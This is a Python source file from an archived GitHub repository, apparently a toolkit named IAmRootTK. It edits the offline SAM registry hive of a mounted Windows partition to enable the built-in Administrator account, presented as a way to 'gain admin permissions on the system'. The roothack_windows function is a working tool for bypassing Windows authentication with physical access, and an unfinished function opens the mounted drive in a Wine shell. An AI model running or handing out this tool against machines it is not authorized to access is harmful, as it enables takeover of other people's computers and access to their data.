This repository has been archived by the owner on Sep 5, 2024. It is now read-only.
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathwindows.py
227 lines (191 loc) · 7.56 KB
/
windows.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
import os
import shutil
import subprocess
import time
WINDOWS_ROOT = {
"Windows",
"Users"
}
ELEVATED_ADMIN = r"\SAM\Domains\Account\Users\000001F4"
WINE_CASE_FIX = [
("Windows", "windows"),
("windows/System32", "windows/system32"),
]
WINE_RUNTIME_IMPORT = [
"windows/system32/start.exe",
"windows/system32/aclui.dll"
]
def write_temp_reg(hive):
print("Writing...")
cmd = ["reged", "-C", "-I", hive, r"HKEY_LOCAL_MACHINE", "temp.reg"]
proc = subprocess.Popen(cmd)
proc.wait()
if proc.returncode not in [2, 0]:
raise subprocess.CalledProcessError(proc.returncode, cmd)
print("Ceaning up...")
os.remove("temp.reg")
def is_readonly(mountpoint):
with open("/proc/mounts") as f:
for line in f:
device, mount, driver, tags, _, _ = line.split(" ", maxsplit=6)
if mount == mountpoint.rstrip("/"):
tags = tags.split(",")
if "ro" in tags:
return True
else:
return False
raise ValueError("Mountpoint not found in /proc/mounts")
def is_windows(device):
try:
ls_output = subprocess.check_output(["sudo", "ntfsls", "-f", device]).decode("utf-8")
except subprocess.CalledProcessError as e:
print(e)
return False
ls_contents = ls_output.split("\n")
if WINDOWS_ROOT.intersection(ls_contents) == WINDOWS_ROOT: # WINDOWS_ROOT is fully contained in ls_contents
return True
else:
return False
def assert_readwrite(mountpoint):
if is_readonly(mountpoint):
print("The filesystem was mounted as readonly")
print("This could mean that windows was not shut down properly")
print("To fully shutdown Windows press Shift+PowerOff in the start menu")
exit(1)
def roothack_windows(mountpoint, action=None):
print("Windows roothack")
assert_readwrite(mountpoint)
HKLM_Sam_Hive = os.path.join(mountpoint, "Windows/System32/config/SAM")
print("Hive:", HKLM_Sam_Hive)
print("Exporting elevated admin...")
subprocess.check_call(["reged", "-x", HKLM_Sam_Hive, r"HKEY_LOCAL_MACHINE\SAM", ELEVATED_ADMIN, "temp.reg"])
bts = bytearray([])
key = False
found = False
with open("temp.reg", "r") as f:
for line in f.readlines():
part = None
if line.startswith("\"F\"=hex:"):
key = True
found = True
part = line[9:-3]
elif key:
if line.endswith("\\\n"):
part = line[3:-3]
else:
part = line[3:]
key = False
if part:
print(repr(part))
for byte in part.split(","):
bts.append(int(byte, 16))
if not found:
print(r"Unable to get SAM\Domains\Account\Users\000001F4\F")
print("ElevatedAdmin is corrupted")
exit(1)
print("Value:", bts)
enabled = bts[56]
if enabled == 0x10:
print("System is already roothacked")
if (action in ["disable", "toggle"]) or (action == None and input("Do you wand to remove it (N/y)? ").lower() == "y"):
print("Creating temp.reg...")
bts[56] = 0x11
contents = fr"""Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SAM\Domains\Account\Users\000001F4]
"F"=hex:{",".join([hex(0x100+i)[3:] for i in bts])}
"""
with open("temp.reg", "w") as f:
f.write(contents)
write_temp_reg(HKLM_Sam_Hive)
print("Disabled ElevatedAdmin")
if enabled != 0x11 and enabled != 0x10:
print("Elevated Admin user is corrupted. (key:", hex(enabled), ")")
if input("Try to recover (The system may be damaged!) (N/y)? ").lower() == "y":
enabled = 0x11
else:
exit(1)
if enabled == 0x11 and action in ["enable", "toggle", None]:
print("Creating temp.reg...")
bts[56] = 0x10
contents = fr"""Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SAM\Domains\Account\Users\000001F4]
"F"=hex:{",".join([hex(0x100+i)[3:] for i in bts])}
"""
with open("temp.reg", "w") as f:
f.write(contents)
write_temp_reg(HKLM_Sam_Hive)
print("Enabled EvelatedAdmin")
print("You can now boot back into the os log in as Administrator")
print("This account can have diffrent names depending on the system language")
def direct_shell(mountpoint):
print("Windows direct shell")
raise NotImplementedError
assert_readwrite(mountpoint)
ver = subprocess.Popen("wine --version", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
if ver.wait():
print("Direct shell requires WINE to be installed")
print("Install wine using your package manager")
exit(1)
version_encoded, _ = ver.communicate()
version = version_encoded.decode("utf-8").strip("\n")
print("Wine version:", version)
passwd_line = subprocess.check_output("getent passwd | grep -E \"^`logname`\"", shell=True).decode()
username, password, uid, gid, longname, homedir, shell = passwd_line.split(":")
wine_c = os.path.join(homedir, ".wine/drive_c")
wine_c_bak = os.path.join(homedir, ".wine/drive_c.IAMROOT.BAK")
print("C:", wine_c)
runtime_copied = []
if os.path.exists(wine_c) and not os.path.exists(wine_c_bak):
print("Making drive_c backup...")
os.rename(wine_c, wine_c_bak)
try:
print("Symlinking the filesystem...")
os.symlink(mountpoint, wine_c)
print("Fixing casing...")
for src, dst in WINE_CASE_FIX:
print(src, "->", dst)
os.rename(os.path.join(wine_c, src), os.path.join(wine_c, dst))
print("Copying wine runtime files...")
for file in WINE_RUNTIME_IMPORT:
print(file)
if not os.path.exists(os.path.join(wine_c, file)):
if not os.path.exists(os.path.join(wine_c_bak, file)):
print("WARNING: Runtime file", file, "was not found in drive_c backup")
continue
print("Copying", file)
runtime_copied.append(file)
shutil.copy(os.path.join(wine_c_bak, file), os.path.join(wine_c, file))
print("Running explorer...")
subprocess.Popen(["sudo", "su", username, "-c", "wine cmd"]).wait()
except Exception as e:
print("An error occured!")
print(type(e).__name__+":", str(e))
finally:
print("Exited.")
print("Removing wine runtime files...")
for file in runtime_copied:
if not os.path.exists(os.path.join(wine_c, file)):
print("WARNING: Runtime file", file, "was marked as copied, but it's not found")
continue
os.remove(os.path.join(wine_c, file))
print("Restoring casing...")
for src, dst in reversed(WINE_CASE_FIX):
print(dst, "->", src)
os.rename(os.path.join(wine_c, dst), os.path.join(wine_c, src))
if os.path.islink(wine_c):
print("Removing symlink...")
os.remove(wine_c)
if os.path.exists(wine_c_bak):
print("Restoring backup...")
os.rename(wine_c_bak, wine_c)
print("Restored.")
roothack = roothack_windows
shell = lambda *a: (
print("Shell in unavailable for windows"),
print("If you can figure out how to do it, make a pull request to"),
print("https://github.com/highghlow/IAmRootTK"),
exit(1)
)
TOOLS = {
"Gain admin permissions on the system": roothack_windows,
}